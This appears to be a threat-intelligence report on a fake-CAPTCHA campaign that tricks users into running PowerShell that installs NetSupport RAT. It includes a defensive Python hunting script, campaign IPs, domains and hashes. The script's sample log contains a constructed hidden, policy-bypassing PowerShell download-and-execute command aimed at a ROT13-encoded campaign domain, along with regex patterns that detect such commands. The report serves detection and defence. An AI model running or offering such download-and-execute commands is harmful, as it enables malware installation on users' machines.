How Threat Actors Exploit Human Trust: A Breakdown of the 'Prove You Are Human' Malware Scheme

June 5, 2025, 10 p.m.

Description

This campaign abuses user trust through deceptive websites, including spoofed Gitcodes pages and fake Docusign verification pages. A fake CAPTCHA ("prove you are human") prompt poisons the victim's clipboard with a PowerShell command and talks them into pasting and running it on their Windows machine; the resulting multi-stage chain installs NetSupport RAT. The campaign spans many domains, obfuscates its stages with ROT13 encoding, and establishes persistence on the infected host. The same technique was observed on other spoofed content, including Okta and popular media apps. Because the lure mimics routine online interactions, it relies on users acting out of habit, which is why unexpected "verify you are human" prompts that ask you to run something should be treated with suspicion.
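The description above gives a defender two handles: the victim launches PowerShell from a pasted command, and the stages hide their strings behind ROT13, which leaves digits and dots untouched. The following Python hunt is an added example written for this page, not code from the original report. It scores constructed process-creation records (tab-separated fields, invented hostnames and a made-up command line) for the traits of a pasted Win+R lure and matches campaign domains and IPs from this page's indicator list both as written and after ROT13 decoding. The field layout, the `SUSPICIOUS_ARGS` heuristics and the sample command line are assumptions for illustration.

```python
"""Hunt for the 'Prove You Are Human' lure in Windows process-creation telemetry.

Added example, not code from the original report. Log records, hostnames and the
PowerShell command line are constructed; the domains and IPs come from the
indicator list on this page.
"""
import codecs
import re
from dataclasses import dataclass, field

# Subset of the report's indicators used as the match list.
CAMPAIGN_DOMAINS = {
    "gitcodes.org", "gitcodes.net", "gitcodes.io", "givcodes.com",
    "pastefy.net", "0xpaste.com", "tradingviewtool.com",
}
CAMPAIGN_IPS = {
    "194.26.232.180", "95.215.204.156", "91.211.249.44",
    "185.209.21.241", "212.86.115.52",
}

# Traits of a command a victim pastes into the Run dialog (assumed heuristics):
# hidden window, policy bypass, in-memory download-and-execute, or a long
# base64 argument.
SUSPICIOUS_ARGS = {
    "hidden_window": r"-w(?:indowstyle)?\s+hidden",
    "policy_bypass": r"-(?:ep|executionpolicy)\s+bypass",
    "in_memory_exec": r"\biex\b|invoke-expression",
    "remote_fetch": r"\b(?:iwr|invoke-webrequest|downloadstring|net\.webclient)\b",
    "encoded_command": r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}",
}


@dataclass
class Finding:
    host: str
    ts: str
    reasons: list = field(default_factory=list)
    indicators: set = field(default_factory=set)


def rot13(text: str) -> str:
    """ROT13 is its own inverse, so one call both encodes and decodes."""
    return codecs.decode(text, "rot_13")


def parse_event(line: str) -> dict:
    """Constructed record format: ts<TAB>host<TAB>parent_image<TAB>image<TAB>command_line."""
    ts, host, parent, image, cmdline = line.rstrip("\n").split("\t", 4)
    return {"ts": ts, "host": host, "parent": parent.lower(),
            "image": image.lower(), "cmdline": cmdline}


def find_indicators(text: str) -> set:
    """Match campaign domains/IPs in the text as-is and after ROT13 decoding.
    Digits and dots survive ROT13, so IPs match in either view."""
    hits = set()
    for view in (text.lower(), rot13(text.lower())):
        hits.update(d for d in CAMPAIGN_DOMAINS if d in view)
        hits.update(ip for ip in CAMPAIGN_IPS if ip in view)
    return hits


def score_event(ev: dict):
    """Return a Finding for a PowerShell launch that looks like a pasted lure
    reaching campaign infrastructure, otherwise None."""
    if not ev["image"].endswith(("powershell.exe", "pwsh.exe")):
        return None
    f = Finding(host=ev["host"], ts=ev["ts"])
    # A Win+R / Run dialog launch puts PowerShell directly under explorer.exe.
    if ev["parent"].endswith("explorer.exe"):
        f.reasons.append("launched_from_explorer")
    for name, pattern in SUSPICIOUS_ARGS.items():
        if re.search(pattern, ev["cmdline"], re.IGNORECASE):
            f.reasons.append(name)
    f.indicators = find_indicators(ev["cmdline"])
    if f.indicators:
        f.reasons.append("campaign_indicator")
    # Alert on infrastructure overlap, or on at least two behavioural traits.
    return f if f.indicators or len(f.reasons) >= 2 else None


def hunt(lines) -> list:
    findings = []
    for line in lines:
        if line.strip():
            f = score_event(parse_event(line))
            if f:
                findings.append(f)
    return findings


# Constructed sample telemetry: one ROT13-wrapped lure, one admin's own script.
# 'uggcf://tvgpbqrf.bet/irevsl' is rot13('https://gitcodes.org/verify'); the path is invented.
SAMPLE_LOG = [
    "\t".join([
        "2025-06-05T21:19:03Z", "WS-0142", r"C:\Windows\explorer.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "powershell -w hidden -ep bypass -c \"iex ((New-Object Net.WebClient)"
        ".DownloadString('uggcf://tvgpbqrf.bet/irevsl'))\"",
    ]),
    "\t".join([
        "2025-06-05T21:20:11Z", "WS-0142", r"C:\Windows\System32\svchost.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        r"powershell.exe -File C:\Scripts\inventory.ps1",
    ]),
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_LOG):
        print(finding.host, finding.ts, sorted(finding.reasons), sorted(finding.indicators))
```

The second record is a scheduled-task style launch under svchost.exe with no suspicious arguments and no indicator overlap, so it is dropped; the first fires on the explorer.exe parent, the hidden-window and bypass flags, the in-memory fetch, and the ROT13-decoded `gitcodes.org`. In production, feed this the command line and parent image from Sysmon Event ID 1 or Security 4688, and extend the match list with the full indicator set below.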

Date

  • Created: June 5, 2025, 9:19 p.m.
  • Published: June 5, 2025, 9:19 p.m.
  • Modified: June 5, 2025, 10 p.m.

Indicators

  • a8b4797b7e82709d835f1e24a0118e83d76c69be8338e340c7b850c20f07034d
  • 3acc40334ef86fd0422fb386ca4fb8836c4fa0e722a5fcfa0086b9182127c1d7
  • 254732635529a0567babf4f78973ad3af5633fd29734ea831e5792292bbf16cd
  • f9a241a768397efb4b43924fbd32186fcb1c88716fff3085d3ddcdd322d3404f
  • d7fadf7ef45c475bd9a759a771d99ccf95edfa8a0c101ce2439a07b66c2e5c72
  • e9fe19455642673b14c77d18a1e7ed925f23906bf11237dfafd7fb2cba1f666d
  • c6907acabf2edf0be959c64a434e101963f7c18dcf79f116e0ce6b5ced5dd08c
  • b2daa2b5afb389828e088ec8b27c0636bdad94b2ef71dcf8034ee601cb60d8d6
  • b258de3b7ef42b4f4bfb0fb5ffe7c55df6aef01cc591abe34a70d1ff82130cd5
  • b3e879b5952988fb0c656240365db8f01198f9d83cd2a3ec0e2a8ee172e20a11
  • ab8fdde9fb9b88c400c737d460dcbf559648dc2768981bdd68f55e1f98292c2a
  • 8ffacc942d1c3f45e797369a1f4cbd5dcd84372abf979b06220236d5a5cea649
  • 89043d2817d1bb4cb57ed939823dca0af9ae412655a6c75c694cb13d088efe5a
  • 58874c0dc26a78cdc058f84af9967f31b3c43173edc7515fa400e6ef8386205f
  • 80b274871e5024dfa9e513219fe3df82cc8fe4255010bd5d04d23d5833962c10
  • 431b0b19239fc5e0eeaee70cd6e807868142e8cd0b2b6b1bd4a7a2cc8eb57d15
  • 1a128f6748d71d02c72ba51268be181143405830a4e48dfa53bf3d6ed3391211
  • 07576e1db7e7bd0f7d2c54b6749fdd73c72dba8c2ba8ab110b305cfc10c93c80
  • 194.26.232.180
  • 95.215.204.156
  • 91.211.249.44
  • 185.209.21.241
  • 212.86.115.52
  • tradingviewtradingview.dev
  • tradingviewtoolz.com
  • tradingviewtool.com
  • tradingviewbeta.dev
  • tradingviewdev.com
  • tradingviewindicator.dev
  • tradingview-beta.dev
  • tradingviewai.dev
  • tradingview-ai.dev
  • pastefy.net
  • pastefy.pro
  • pastefy.com
  • pasteco.com
  • modedeveloper.com
  • modedevs.ai
  • modedev.ai
  • modedeveloper.ai
  • mhousecreative.com
  • loyalcompany.net
  • hubofnotion.com
  • jeffsorsonblog.dev
  • givcodes.com
  • gitcodes.org
  • gitpaste.com
  • gitcodes.net
  • gitcodes.io
  • devtradingview.net
  • devtradingview.ai
  • devmode-beta.dev
  • devmodebeta.dev
  • developerbeta.dev
  • developer-update.dev
  • developer-package.dev
  • developer-mode.dev
  • developer-beta.dev
  • developer-ai.dev
  • devchart.ai
  • devbetabeta.dev
  • dev-update.dev
  • dev-beta.com
  • codepaste.io
  • dans-lupta.xyz
  • charts-beta.dev
  • betatradingview.dev
  • betamodetradingview.dev
  • battalia-dansului.com
  • batalia-dansului.xyz
  • aitradingview.dev
  • 0xpaste.com

Attack Patterns